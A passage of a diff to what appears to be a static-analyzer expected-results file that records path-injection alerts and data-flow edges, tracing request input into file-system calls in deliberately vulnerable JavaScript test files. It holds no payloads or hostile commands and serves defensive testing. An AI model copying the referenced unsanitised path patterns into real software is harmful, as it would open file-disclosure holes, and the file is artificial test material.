user-provided value | +| tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | This path depends on a $@. | tainted-require.js:11:29:11:47 | req.param("module") | user-provided value | +| tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | This path depends on a $@. | tainted-require.js:13:11:13:29 | req.param("module") | user-provided value | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:28:37:28:48 | req.params.x | user-provided value | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:30:34:30:45 | req.params.x | user-provided value | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:32:43:32:58 | req.param("dir") | user-provided value | +| tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:11:18:11:30 | path.slice(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:11:18:11:30 | path.slice(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:15:18:15:46 | unknown ... , path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:17:18:17:28 | path.trim() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:17:18:17:28 | path.trim() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | +| typescript.ts:11:29:11:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:11:29:11:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:20:39:20:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:20:39:20:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:23:39:23:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:23:39:23:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:31:29:31:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:31:29:31:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | edges -| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:10:41:10:44 | path | provenance | | +| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:9:41:9:44 | path | provenance | | | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | provenance | Config | | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | provenance | Config | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | TaintedPath-es6.js:7:7:7:44 | path | provenance | | | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | provenance | Config | -| TaintedPath-es6.js:10:41:10:44 | path | TaintedPath-es6.js:10:26:10:45 | join("public", path) | provenance | Config | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:12:29:12:32 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:15:45:15:48 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:18:33:18:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:21:33:21:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:24:33:24:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:33:31:33:34 | path | provenance | | +| TaintedPath-es6.js:9:41:9:44 | path | TaintedPath-es6.js:9:26:9:45 | join("public", path) | provenance | Config | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:11:29:11:32 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:13:45:13:48 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:16:33:16:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:19:33:19:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:22:33:22:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:31:31:31:34 | path | provenance | | | TaintedPath.js:9:14:9:37 | url.par ... , true) | TaintedPath.js:9:14:9:43 | url.par ... ).query | provenance | Config | | TaintedPath.js:9:14:9:43 | url.par ... ).query | TaintedPath.js:9:14:9:48 | url.par ... ry.path | provenance | Config | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | TaintedPath.js:9:7:9:48 | path | provenance | | | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:9:14:9:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:15:45:15:48 | path | TaintedPath.js:15:29:15:48 | "/home/user/" + path | provenance | Config | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:42:48:42:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:46:45:46:48 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:48:51:48:54 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:50:50:50:53 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:52:52:52:55 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:54:49:54:52 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:56:48:56:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:58:54:58:57 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:60:57:60:60 | path | provenance | | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | TaintedPath.js:38:10:38:39 | url.par ... ).query | provenance | Config | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | TaintedPath.js:38:10:38:44 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | TaintedPath.js:38:3:38:44 | path | provenance | | -| TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:38:10:38:33 | url.par ... , true) | provenance | Config | -| TaintedPath.js:42:48:42:51 | path | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:46:45:46:48 | path | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | provenance | Config | -| TaintedPath.js:48:51:48:54 | path | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:50:50:50:53 | path | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:52:52:52:55 | path | TaintedPath.js:52:29:52:56 | pathMod ... , path) | provenance | Config | -| TaintedPath.js:54:49:54:52 | path | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | provenance | Config | -| TaintedPath.js:56:48:56:51 | path | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:58:54:58:57 | path | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:60:57:60:60 | path | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | provenance | Config | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | TaintedPath.js:65:31:65:76 | require ... ).query | provenance | Config | -| TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:70 | require ... eq.url) | provenance | Config | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | TaintedPath.js:66:31:66:74 | require ... ).query | provenance | Config | -| TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:68 | require ... eq.url) | provenance | Config | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | TaintedPath.js:67:31:67:73 | require ... ).query | provenance | Config | -| TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:67 | require ... eq.url) | provenance | Config | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:86:44:86:47 | path | provenance | | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:87:14:87:17 | path | provenance | | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | TaintedPath.js:84:13:84:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | TaintedPath.js:84:13:84:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | TaintedPath.js:84:6:84:47 | path | provenance | | -| TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:84:13:84:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:86:44:86:47 | path | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | provenance | Config | -| TaintedPath.js:87:14:87:17 | path | TaintedPath.js:88:32:88:39 | realpath | provenance | Config | -| TaintedPath.js:88:32:88:39 | realpath | TaintedPath.js:89:45:89:52 | realpath | provenance | | -| TaintedPath.js:120:6:120:47 | path | TaintedPath.js:122:23:122:26 | path | provenance | | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | TaintedPath.js:120:13:120:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | TaintedPath.js:120:13:120:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | TaintedPath.js:120:6:120:47 | path | provenance | | -| TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:120:13:120:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:128:19:128:22 | path | provenance | | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:130:15:130:18 | path | provenance | | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | TaintedPath.js:126:14:126:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | TaintedPath.js:126:14:126:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | TaintedPath.js:126:7:126:48 | path | provenance | | -| TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:126:14:126:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:132:19:132:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:136:19:136:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:137:28:137:32 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:139:33:139:37 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:142:20:142:24 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:145:19:145:23 | split | provenance | | -| TaintedPath.js:130:15:130:18 | path | TaintedPath.js:130:15:130:29 | path.split("/") | provenance | Config | -| TaintedPath.js:130:15:130:29 | path.split("/") | TaintedPath.js:130:7:130:29 | split | provenance | | -| TaintedPath.js:132:19:132:23 | split | TaintedPath.js:132:19:132:33 | split.join("/") | provenance | Config | -| TaintedPath.js:136:19:136:23 | split | TaintedPath.js:136:19:136:26 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:32 | split | TaintedPath.js:137:28:137:35 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:35 | split[x] | TaintedPath.js:137:19:137:35 | prefix + split[x] | provenance | Config | -| TaintedPath.js:139:7:139:38 | concatted | TaintedPath.js:140:19:140:27 | concatted | provenance | | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | TaintedPath.js:139:7:139:38 | concatted | provenance | | -| TaintedPath.js:139:33:139:37 | split | TaintedPath.js:139:19:139:38 | prefix.concat(split) | provenance | Config | -| TaintedPath.js:140:19:140:27 | concatted | TaintedPath.js:140:19:140:37 | concatted.join("/") | provenance | Config | -| TaintedPath.js:142:7:142:39 | concatted2 | TaintedPath.js:143:19:143:28 | concatted2 | provenance | | -| TaintedPath.js:142:20:142:24 | split | TaintedPath.js:142:20:142:39 | split.concat(prefix) | provenance | Config | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | TaintedPath.js:142:7:142:39 | concatted2 | provenance | | -| TaintedPath.js:143:19:143:28 | concatted2 | TaintedPath.js:143:19:143:38 | concatted2.join("/") | provenance | Config | -| TaintedPath.js:145:19:145:23 | split | TaintedPath.js:145:19:145:29 | split.pop() | provenance | Config | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:154:29:154:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:160:29:160:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:161:29:161:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:162:29:162:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:163:29:163:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:178:40:178:43 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:179:50:179:53 | path | provenance | | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | TaintedPath.js:150:14:150:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | TaintedPath.js:150:14:150:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | TaintedPath.js:150:7:150:48 | path | provenance | | -| TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:150:14:150:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:154:29:154:32 | path | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:160:29:160:32 | path | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:161:29:161:32 | path | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:162:29:162:32 | path | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:163:29:163:32 | path | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:178:40:178:43 | path | TaintedPath.js:178:40:178:73 | path.re ... +/, '') | provenance | Config | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | provenance | Config | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | provenance | Config | -| TaintedPath.js:179:50:179:53 | path | TaintedPath.js:179:29:179:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | provenance | Config | -| TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:45 | qs.parse(req.url) | provenance | Config | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | provenance | Config | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | provenance | Config | -| TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:38:188:58 | normali ... eq.url) | provenance | Config | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | provenance | Config | -| TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | provenance | Config | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:196:31:196:34 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:197:45:197:48 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:198:35:198:38 | path | provenance | | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | TaintedPath.js:195:14:195:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | TaintedPath.js:195:14:195:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | TaintedPath.js:195:7:195:48 | path | provenance | | -| TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:195:14:195:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:202:7:202:48 | path | TaintedPath.js:206:29:206:32 | path | provenance | | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | TaintedPath.js:202:14:202:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | TaintedPath.js:202:14:202:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | TaintedPath.js:202:7:202:48 | path | provenance | | -| TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:202:14:202:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:206:29:206:32 | path | TaintedPath.js:206:29:206:85 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:213:29:213:32 | path | provenance | | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:216:31:216:34 | path | provenance | | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | TaintedPath.js:211:14:211:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | TaintedPath.js:211:14:211:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | TaintedPath.js:211:7:211:48 | path | provenance | | -| TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:211:14:211:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:213:29:213:32 | path | TaintedPath.js:213:29:213:68 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:216:31:216:34 | path | TaintedPath.js:216:31:216:69 | path.re ... '), '') | provenance | Config | -| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:11:36:11:43 | filePath | provenance | | +| TaintedPath.js:13:45:13:48 | path | TaintedPath.js:13:29:13:48 | "/home/user/" + path | provenance | Config | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:39:48:39:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:42:45:42:48 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:43:51:43:54 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:44:50:44:53 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:45:52:45:55 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:46:49:46:52 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:47:48:47:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:48:54:48:57 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:49:57:49:60 | path | provenance | | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | TaintedPath.js:36:10:36:39 | url.par ... ).query | provenance | Config | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | TaintedPath.js:36:10:36:44 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | TaintedPath.js:36:3:36:44 | path | provenance | | +| TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:36:10:36:33 | url.par ... , true) | provenance | Config | +| TaintedPath.js:39:48:39:51 | path | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:42:45:42:48 | path | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | provenance | Config | +| TaintedPath.js:43:51:43:54 | path | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:44:50:44:53 | path | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:45:52:45:55 | path | TaintedPath.js:45:29:45:56 | pathMod ... , path) | provenance | Config | +| TaintedPath.js:46:49:46:52 | path | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | provenance | Config | +| TaintedPath.js:47:48:47:51 | path | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:48:54:48:57 | path | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:49:57:49:60 | path | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | provenance | Config | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | TaintedPath.js:54:31:54:76 | require ... ).query | provenance | Config | +| TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:70 | require ... eq.url) | provenance | Config | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | TaintedPath.js:55:31:55:74 | require ... ).query | provenance | Config | +| TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:68 | require ... eq.url) | provenance | Config | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | TaintedPath.js:56:31:56:73 | require ... ).query | provenance | Config | +| TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:67 | require ... eq.url) | provenance | Config | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:75:44:75:47 | path | provenance | | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:76:14:76:17 | path | provenance | | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | TaintedPath.js:73:13:73:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | TaintedPath.js:73:13:73:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | TaintedPath.js:73:6:73:47 | path | provenance | | +| TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:73:13:73:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:75:44:75:47 | path | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | provenance | Config | +| TaintedPath.js:76:14:76:17 | path | TaintedPath.js:77:32:77:39 | realpath | provenance | Config | +| TaintedPath.js:77:32:77:39 | realpath | TaintedPath.js:78:45:78:52 | realpath | provenance | | +| TaintedPath.js:109:6:109:47 | path | TaintedPath.js:111:23:111:26 | path | provenance | | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | TaintedPath.js:109:13:109:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | TaintedPath.js:109:13:109:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | TaintedPath.js:109:6:109:47 | path | provenance | | +| TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:109:13:109:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:117:19:117:22 | path | provenance | | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:119:15:119:18 | path | provenance | | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | TaintedPath.js:115:14:115:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | TaintedPath.js:115:14:115:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | TaintedPath.js:115:7:115:48 | path | provenance | | +| TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:115:14:115:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:121:19:121:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:125:19:125:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:126:28:126:32 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:128:33:128:37 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:131:20:131:24 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:134:19:134:23 | split | provenance | | +| TaintedPath.js:119:15:119:18 | path | TaintedPath.js:119:15:119:29 | path.split("/") | provenance | Config | +| TaintedPath.js:119:15:119:29 | path.split("/") | TaintedPath.js:119:7:119:29 | split | provenance | | +| TaintedPath.js:121:19:121:23 | split | TaintedPath.js:121:19:121:33 | split.join("/") | provenance | Config | +| TaintedPath.js:125:19:125:23 | split | TaintedPath.js:125:19:125:26 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:32 | split | TaintedPath.js:126:28:126:35 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:35 | split[x] | TaintedPath.js:126:19:126:35 | prefix + split[x] | 